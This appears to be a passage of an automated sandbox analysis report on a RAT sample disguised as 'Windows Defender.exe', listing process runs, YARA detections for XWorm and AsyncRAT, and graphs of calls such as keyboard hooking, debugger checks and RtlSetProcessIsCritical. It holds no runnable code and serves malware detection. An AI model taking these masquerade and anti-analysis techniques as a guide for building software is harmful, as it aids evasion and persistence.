                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0xc10000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Windows Defender.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 82%, ReversingLabs
                                    Has exited:true

                                    Target ID:20
                                    Start time:08:03:25
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0xca0000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:08:03:33
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0x560000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:08:04:01
                                    Start date:08/10/2024
                                    Path:C:\Users\user\AppData\Local\Windows Defender.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Windows Defender.exe"
                                    Imagebase:0x400000
                                    File size:87'552 bytes
                                    MD5 hash:E9FF85404CBD9C9DF15E13D0E4B960B1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:22.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:8.8%
                                      Total number of Nodes:34
                                      Total number of Limit Nodes:1
                                      execution_graph
                                      Nodes (id, address, API called):
                                      5071 7ffd34699d98
                                      5072 7ffd34699da1 SetWindowsHookExW
                                      5074 7ffd34699e71
                                      5111 7ffd3469764a
                                      5112 7ffd34697a70 CheckRemoteDebuggerPresent
                                      5114 7ffd34697b0f
                                      5099 7ffd3469b26e
                                      5100 7ffd3469b2ac
                                      5102 7ffd3469b2d0
                                      5101 7ffd34699818 RtlSetProcessIsCritical
                                      5075 7ffd34697a51
                                      5077 7ffd34697a6c CheckRemoteDebuggerPresent
                                      5078 7ffd34697b0f
                                      5079 7ffd3469a584
                                      5080 7ffd3469a58d
                                      5083 7ffd3469a62f
                                      5087 7ffd34699818
                                      5082 7ffd3469a67a
                                      5091 7ffd34699838
                                      5088 7ffd34699821 RtlSetProcessIsCritical
                                      5090 7ffd34699932
                                      5092 7ffd34699841 RtlSetProcessIsCritical
                                      5094 7ffd34699932
                                      5095 7ffd34699848
                                      5097 7ffd34699851 RtlSetProcessIsCritical
                                      5098 7ffd34699932
                                      5103 7ffd3469a663
                                      5104 7ffd3469a665
                                      5105 7ffd34699818 RtlSetProcessIsCritical
                                      5106 7ffd3469a67a
                                      5107 7ffd34699838 RtlSetProcessIsCritical
                                      5108 7ffd3469a68d
                                      5109 7ffd34699848 RtlSetProcessIsCritical
                                      5110 7ffd3469a6bb
                                      Edges:
                                      5071->5072, 5072->5074
                                      5111->5112, 5112->5114
                                      5099->5100, 5099->5102, 5100->5101, 5101->5102
                                      5075->5077, 5077->5078
                                      5079->5080, 5080->5083, 5080->5087, 5082->5091, 5087->5088, 5088->5090, 5090->5082, 5091->5092, 5092->5094, 5094->5095, 5095->5097, 5097->5098, 5098->5083
                                      5103->5104, 5104->5105, 5105->5106, 5106->5107, 5107->5108, 5108->5109, 5109->5110

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CAL_^
                                      • API String ID: 0-3140518731
                                      • Opcode ID: 08a96b00fed9e154557e3864769da71711cd0edffcaf3f583e5689b2b070f104
                                      • Instruction ID: c58aaf7c4636b85ad649099d356cddc351cffa32ec86fafe77812084ac49b729
                                      • Opcode Fuzzy Hash: 08a96b00fed9e154557e3864769da71711cd0edffcaf3f583e5689b2b070f104
                                      • Instruction Fuzzy Hash: 2322B471B18B194FEB98FB7884B97B977D2FF99300F54057AE04EC3292DE68A8418741

                                      Control-flow Graph

control_flow_graph
  221 7ffd3469764a-7ffd34697b0d CheckRemoteDebuggerPresent
  226 7ffd34697b15-7ffd34697b58
  227 7ffd34697b0f
  221->226 221->227 227->226
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: a330f5df000297fe05b2fdc229c0ff1260210cb27d5aa253d2bde152bdf1d94d
                                      • Instruction ID: 79415827e06fb6b45a3f8604073da9a522128926a4fe82904dec7dd782bdc270
                                      • Opcode Fuzzy Hash: a330f5df000297fe05b2fdc229c0ff1260210cb27d5aa253d2bde152bdf1d94d
                                      • Instruction Fuzzy Hash: 1B31B23190862C8FDB58DF9CD8897FA7BE0EF69311F04426AD48AD7241DB74A8468B91

                                      Control-flow Graph

                                      control_flow_graph 338 7ffd34696096-7ffd346960a3 339 7ffd346960a5-7ffd346960ad 338->339 340 7ffd346960ae-7ffd346960da 338->340 339->340 341 7ffd346960dc-7ffd3469610f 340->341 342 7ffd34696110-7ffd34696177 340->342 341->342 346 7ffd34696179-7ffd34696182 342->346 347 7ffd346961e3 342->347 346->347 348 7ffd34696184-7ffd34696190 346->348 349 7ffd346961e5-7ffd3469620a 347->349 350 7ffd346961c9-7ffd346961e1 348->350 351 7ffd34696192-7ffd346961a4 348->351 356 7ffd34696276 349->356 357 7ffd3469620c-7ffd34696215 349->357 350->349 352 7ffd346961a6 351->352 353 7ffd346961a8-7ffd346961bb 351->353 352->353 353->353 355 7ffd346961bd-7ffd346961c5 353->355 355->350 358 7ffd34696278-7ffd34696320 356->358 357->356 359 7ffd34696217-7ffd34696223 357->359 370 7ffd3469638e 358->370 371 7ffd34696322-7ffd3469632c 358->371 360 7ffd34696225-7ffd34696237 359->360 361 7ffd3469625c-7ffd34696274 359->361 363 7ffd34696239 360->363 364 7ffd3469623b-7ffd3469624e 360->364 361->358 363->364 364->364 366 7ffd34696250-7ffd34696258 364->366 366->361 372 7ffd34696390-7ffd346963b9 370->372 371->370 373 7ffd3469632e-7ffd3469633b 371->373 380 7ffd346963bb-7ffd346963c6 372->380 381 7ffd34696423 372->381 374 7ffd3469633d-7ffd3469634f 373->374 375 7ffd34696374-7ffd3469638c 373->375 377 7ffd34696351 374->377 378 7ffd34696353-7ffd34696366 374->378 375->372 377->378 378->378 379 7ffd34696368-7ffd34696370 378->379 379->375 380->381 382 7ffd346963c8-7ffd346963d6 380->382 383 7ffd34696425-7ffd346964b6 381->383 384 7ffd346963d8-7ffd346963ea 382->384 385 7ffd3469640f-7ffd34696421 382->385 391 7ffd346964bc-7ffd346964cb 383->391 387 7ffd346963ec 384->387 388 7ffd346963ee-7ffd34696401 384->388 385->383 387->388 388->388 389 7ffd34696403-7ffd3469640b 388->389 389->385 392 7ffd346964cd 391->392 393 7ffd346964d3-7ffd34696538 call 7ffd34696554 391->393 392->393 400 7ffd3469653a 393->400 401 7ffd3469653f-7ffd34696553 393->401 400->401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: df065bce2b1b31e94a4b70038744a769cbd981ff6b5b5161e4635cc153052b12
                                      • Instruction ID: 2c404c56c4e3438fb10891b25e239b66e751cada963914d352627e94ffa73900
                                      • Opcode Fuzzy Hash: df065bce2b1b31e94a4b70038744a769cbd981ff6b5b5161e4635cc153052b12
                                      • Instruction Fuzzy Hash: CCF18530608B8D8FEBA9DF28C8557E937E1FF55310F04426EE84DC72A5DB78A9458B81

                                      Control-flow Graph

                                      control_flow_graph 530 7ffd34696e42-7ffd34696e4f 531 7ffd34696e5a-7ffd34696e8a 530->531 532 7ffd34696e51-7ffd34696e59 530->532 533 7ffd34696e8c-7ffd34696ebf 531->533 534 7ffd34696ec0-7ffd34696f27 531->534 532->531 533->534 538 7ffd34696f29-7ffd34696f32 534->538 539 7ffd34696f93 534->539 538->539 541 7ffd34696f34-7ffd34696f40 538->541 540 7ffd34696f95-7ffd34696fba 539->540 547 7ffd34697026 540->547 548 7ffd34696fbc-7ffd34696fc5 540->548 542 7ffd34696f79-7ffd34696f91 541->542 543 7ffd34696f42-7ffd34696f54 541->543 542->540 545 7ffd34696f56 543->545 546 7ffd34696f58-7ffd34696f6b 543->546 545->546 546->546 549 7ffd34696f6d-7ffd34696f75 546->549 551 7ffd34697028-7ffd3469704d 547->551 548->547 550 7ffd34696fc7-7ffd34696fd3 548->550 549->542 552 7ffd34696fd5-7ffd34696fe7 550->552 553 7ffd3469700c-7ffd34697024 550->553 558 7ffd346970bb 551->558 559 7ffd3469704f-7ffd34697059 551->559 554 7ffd34696fe9 552->554 555 7ffd34696feb-7ffd34696ffe 552->555 553->551 554->555 555->555 557 7ffd34697000-7ffd34697008 555->557 557->553 561 7ffd346970bd-7ffd346970eb 558->561 559->558 560 7ffd3469705b-7ffd34697068 559->560 562 7ffd3469706a-7ffd3469707c 560->562 563 7ffd346970a1-7ffd346970b9 560->563 568 7ffd3469715b 561->568 569 7ffd346970ed-7ffd346970f8 561->569 564 7ffd3469707e 562->564 565 7ffd34697080-7ffd34697093 562->565 563->561 564->565 565->565 567 7ffd34697095-7ffd3469709d 565->567 567->563 570 7ffd3469715d-7ffd34697235 568->570 569->568 571 7ffd346970fa-7ffd34697108 569->571 581 7ffd3469723b-7ffd3469724a 570->581 572 7ffd3469710a-7ffd3469711c 571->572 573 7ffd34697141-7ffd34697159 571->573 575 7ffd3469711e 572->575 576 7ffd34697120-7ffd34697133 572->576 573->570 575->576 576->576 578 7ffd34697135-7ffd3469713d 576->578 578->573 582 7ffd3469724c 581->582 583 7ffd34697252-7ffd346972b4 call 7ffd346972d0 581->583 582->583 590 7ffd346972b6 583->590 591 7ffd346972bb-7ffd346972cf 583->591 590->591
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67e95fe4ff0cec3860af73acd530af0c276117c02a144ab334ecada680da474f
                                      • Instruction ID: bd0355f74df3e7cbbeffb97e45c481d08d96e7b5134745227ca411d1e0966896
                                      • Opcode Fuzzy Hash: 67e95fe4ff0cec3860af73acd530af0c276117c02a144ab334ecada680da474f
                                      • Instruction Fuzzy Hash: EDE1B630608A4E8FEBA8DF28C8657F977E1FF55311F04426EE84DC7291DE78A9458781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 920e1260fc3e90f9e067676263635b804ff548bcc989bbd18fcdf7be20363fc2
                                      • Instruction ID: e92c86c4dc17bdc193826f8dd8181ee52838b6c5231762ed4b41d9283241130c
                                      • Opcode Fuzzy Hash: 920e1260fc3e90f9e067676263635b804ff548bcc989bbd18fcdf7be20363fc2
                                      • Instruction Fuzzy Hash: A2C1B031B1CA194FEBD8EB6884B53B977D2FF9A300F44057AD14ED3292DE6CA8429741
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ffbdc660ebb52f62c9a2749cc818cc7fed05ca494b5905838eca31bc25def1f4
                                      • Instruction ID: 2f83b0f405d7669ed5620fd6df276c177c4af3d938958e5901b200c72c7a5c1c
                                      • Opcode Fuzzy Hash: ffbdc660ebb52f62c9a2749cc818cc7fed05ca494b5905838eca31bc25def1f4
                                      • Instruction Fuzzy Hash: F151F010B1E6C50FE796ABB858B52B57FD5DF87229B0808FFE0CAC61A3DD581816C342

                                      Control-flow Graph

control_flow_graph
  166 7ffd346997c8-7ffd346997dc
  168 7ffd346997de-7ffd346997f2
  169 7ffd34699812-7ffd3469a8d6
  172 7ffd34699828-7ffd34699829
  173 7ffd346997f4-7ffd34699805
  180 7ffd3469a8d8
  181 7ffd3469a8de-7ffd3469a8fa
  166->168 166->169 168->172 168->173 169->180 169->181 180->181
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: 1e437b7980930569df346ba0fb70d4f28feead003b7c019907a0cdaf4c63140d
                                      • Instruction ID: c7f2680f1a000cc3866824f320f2f1a01d0a2e23c355363412033512fcc203ed
                                      • Opcode Fuzzy Hash: 1e437b7980930569df346ba0fb70d4f28feead003b7c019907a0cdaf4c63140d
                                      • Instruction Fuzzy Hash: 9A814B72A0DA888FEB19DF9898956F97BE0FF56310F04007FD089D7293DA74A849CB51

                                      Control-flow Graph

control_flow_graph
  182 7ffd34699d98-7ffd34699d9f
  183 7ffd34699daa-7ffd34699dba
  184 7ffd34699da1-7ffd34699da9
  185 7ffd34699dbc-7ffd34699dec
  186 7ffd34699df0-7ffd34699e1d
  189 7ffd34699ea9-7ffd34699ead
  190 7ffd34699e23-7ffd34699e30
  191 7ffd34699e32-7ffd34699e6f SetWindowsHookExW
  193 7ffd34699e77-7ffd34699ea8
  194 7ffd34699e71
  182->183 182->184 183->185 183->186 184->183 185->186 186->189 186->190 189->191 190->191 191->193 191->194 194->193
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0
                                      • Opcode ID: 182af3de067c48b85242978f4f1bcdf649d6760bbdf09b3633dc49e6bc93b5ad
                                      • Instruction ID: 23086411386b65569164d94e68d1ae7621be82baf9aaa4527067b8f5a2191053
                                      • Opcode Fuzzy Hash: 182af3de067c48b85242978f4f1bcdf649d6760bbdf09b3633dc49e6bc93b5ad
                                      • Instruction Fuzzy Hash: 39410931A0CA5D4FDB19DFAC98566F97BE1EF5A321F00027FD049C3292CA656816CBC1

                                      Control-flow Graph

control_flow_graph
  197 7ffd34699848-7ffd34699862
  200 7ffd34699898-7ffd346998a9
  201 7ffd34699864-7ffd3469987a
  203 7ffd346998b0-7ffd34699930 RtlSetProcessIsCritical
  207 7ffd3469987c-7ffd34699891
  208 7ffd34699938-7ffd3469996d
  209 7ffd34699932
  197->200 197->201 200->203 201->203 201->207 203->208 203->209 207->200 209->208
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: dea6036fc6d61d392022380cc7895298d70fe50f7b73b0d2920d5c2076c7c2b3
                                      • Instruction ID: 39e34935169c79fdf527f0d8cf02b1942a0e548a3112ffd4f534c86e788e5d7b
                                      • Opcode Fuzzy Hash: dea6036fc6d61d392022380cc7895298d70fe50f7b73b0d2920d5c2076c7c2b3
                                      • Instruction Fuzzy Hash: 6A41F531A0CA598FEB28DF9D98956F97BE0FF65311F04013ED08AD3282DB746846CB91

                                      Control-flow Graph

control_flow_graph
  212 7ffd34697a51-7ffd34697a6a
  213 7ffd34697a6c-7ffd34697a9f
  214 7ffd34697aa0-7ffd34697b0d CheckRemoteDebuggerPresent
  217 7ffd34697b15-7ffd34697b58
  218 7ffd34697b0f
  212->213 212->214 213->214 214->217 214->218 218->217
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: f86355f7cde9283136f9d4865d296fceb8df0d428c76b0f1c522543b7d2a18d5
                                      • Instruction ID: f70903c8eae0e79b502f7534f58fdf82f11af7ec5fb2ff0f7c631f7631ec2663
                                      • Opcode Fuzzy Hash: f86355f7cde9283136f9d4865d296fceb8df0d428c76b0f1c522543b7d2a18d5
                                      • Instruction Fuzzy Hash: C631233190875C8FCB58DF9CC88A7E97BE0FF65311F05426AD489D7282DB34A846CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3497993527.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2L_I
                                      • API String ID: 0-818225981
                                      • Opcode ID: a3eba47fc5c879db8a9d0a87cd5923f98c9f63eadddd3a4df5bb22430c9023cc
                                      • Instruction ID: 00363af24102926006244dfdfa643763b01472529f9ea16ca2aad824528db02a
                                      • Opcode Fuzzy Hash: a3eba47fc5c879db8a9d0a87cd5923f98c9f63eadddd3a4df5bb22430c9023cc
                                      • Instruction Fuzzy Hash: 23B17157B0E7D21FE753AA6868B50E63F60DF5326575900F7C2D4CB0A3ED0D680A93A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J_H
                                      • API String ID: 0-326533465
                                      • Opcode ID: f8dcca65e0e36a92b37a07d28c18daa067ad833e98ff10e4e2b034eefd2ef0f6
                                      • Instruction ID: c7090912a72c0292b2322aaf0186e57e46ac38a70d8a45667e0652888da7363c
                                      • Opcode Fuzzy Hash: f8dcca65e0e36a92b37a07d28c18daa067ad833e98ff10e4e2b034eefd2ef0f6
                                      • Instruction Fuzzy Hash: 49A2F6B2A0DB894FE766972858A52A47BE1EF57210B0901FBD18DCB1E3DD1CBC079391
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c85f119d7a091c0f837d2dd22001afe47a4da292f1941fd6dc2c4cb3b583be18
                                      • Instruction ID: e02682b074281160a07db8deb1309959fb205d9ac9898c5d3eae35a6c3a11a74
                                      • Opcode Fuzzy Hash: c85f119d7a091c0f837d2dd22001afe47a4da292f1941fd6dc2c4cb3b583be18
                                      • Instruction Fuzzy Hash: F6D15E30A08A5E8FDF94DF58C495AED7BE1FF69300F14416AD40DD72A6CA38E881CB81
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 968aad1950088eff279f204b47e921519c62ef8b2f6bfc027371067264929b03
                                      • Instruction ID: b6fbee7165a76713b1ab677b7b1c0926a2db712f43a85bbe80b19b2e633fa8d6
                                      • Opcode Fuzzy Hash: 968aad1950088eff279f204b47e921519c62ef8b2f6bfc027371067264929b03
                                      • Instruction Fuzzy Hash: BB81483160C7924FD34ADF2888A55F57BE1EF57324B1800BAD9C9CB1A3EA1AA807C751
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf2df2182037b6bdda8e34eaa51e89b3ee97cf5e6e44ea21e093a7c7505b590b
                                      • Instruction ID: ddf5fa31dd6aaae157505d65db82433b6bec6f5a035e41b3dfb8add723485b57
                                      • Opcode Fuzzy Hash: cf2df2182037b6bdda8e34eaa51e89b3ee97cf5e6e44ea21e093a7c7505b590b
                                      • Instruction Fuzzy Hash: 27115E3650D7C44FC7479F289C650A43FB0EF67211B0A00E7D588CB0A3E6698808C7A2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84f346cb3846d69379f95dee3ec3f457ab4849222dcd126b1d34aae179195d97
                                      • Instruction ID: 28d9e074ac6741301a7a5eb86996fb526779f6ce9a56feb0646fd72a8a1aa755
                                      • Opcode Fuzzy Hash: 84f346cb3846d69379f95dee3ec3f457ab4849222dcd126b1d34aae179195d97
                                      • Instruction Fuzzy Hash: E3310731A1CB488FDB5C9F5C984A6E97BE0FB99310F10412FE449D3252DA24B856CBC2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2357965197.00007FFD3456D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3456D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd3456d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5660757c35e2affc6c38c855169ba91f2fb35745a61b354e1f1b367d0110059e
                                      • Instruction ID: 8c11cf107c7ec8f675c55a79b4aed49f828a57d4454ea68bb85fee9f353a283c
                                      • Opcode Fuzzy Hash: 5660757c35e2affc6c38c855169ba91f2fb35745a61b354e1f1b367d0110059e
                                      • Instruction Fuzzy Hash: 1841287180EBC44FD7579B3898959523FF0EF53220B1502DFD088CB1A7D629AC4AC7A2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2358490284.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34680000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04a2e5d12e7309ff1dba5dbbb5df1fcfdd38f1535b6448eb44dd350a215a68fe
                                      • Instruction ID: 9011449cc6c837fdf966c632f63d0548f9ff3ce703da9b5ad58df1cf85fb936c
                                      • Opcode Fuzzy Hash: 04a2e5d12e7309ff1dba5dbbb5df1fcfdd38f1535b6448eb44dd350a215a68fe
                                      • Instruction Fuzzy Hash: 0831E53190CB4C8FDB59DF9C9C496E97BE0EB66320F04416FD44DC7162D674A84ACB91
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea97ae4da80194bc768e33c972562a845e641d98635a37f31670178caceac838
                                      • Instruction ID: 91f43924dbd5e71741a96bd0a638ea16476a4224faaa80dbb1f800342cf8cabb
                                      • Opcode Fuzzy Hash: ea97ae4da80194bc768e33c972562a845e641d98635a37f31670178caceac838
                                      • Instruction Fuzzy Hash: E021B6B3B0DA568FE7A5AB1944E127476D2EF66210B5900FAD24DCB192DD1CFC069381
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61d4a7095677c859b106a962f1b95db21f8422a90ad79e3e25604e895ff66166
                                      • Instruction ID: db00649b7d5640ad5c5eb286a601a38a4e4f4230ed14b99d5f60883feb16a71c
                                      • Opcode Fuzzy Hash: 61d4a7095677c859b106a962f1b95db21f8422a90ad79e3e25604e895ff66166
                                      • Instruction Fuzzy Hash: 44112CB2F0E5498FE7A4DB1984E46B877D1EF4621474900FAD15DCB1A3D91CBC1293C1
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.2359008699.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ffd34750000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                      • Instruction ID: b200309a5081f98b6c52e4dd35fe4e36116ac1a186ebc5d0f21993f2a6adb5c4
                                      • Opcode Fuzzy Hash: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                      • Instruction Fuzzy Hash: 68112772F0D6888FE765DA9844E556877D1EF1A314B1840FEC14CCB193D928B806C391
                                      Memory Dump Source
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14ddd4a0f42e7a6074b2b8a67c4a261c498d6d6abf4f4479b7d74df721b35bc2
                                      • Instruction ID: 8b919dea726b798993a1ba0113260dba7f0df200c840bd0b46e4167b825b4c39
                                      • Opcode Fuzzy Hash: 14ddd4a0f42e7a6074b2b8a67c4a261c498d6d6abf4f4479b7d74df721b35bc2
                                      • Instruction Fuzzy Hash: 9A219572F1491E4BEB94EB98D8A61FD77F1FF95311F500136D14EF2292DD6868029780
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction ID: 24d782f5cfbef73a1acd4f333003a3345614296c0fc24bb6615e5e2cdc2e985f
                                      • Opcode Fuzzy Hash: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
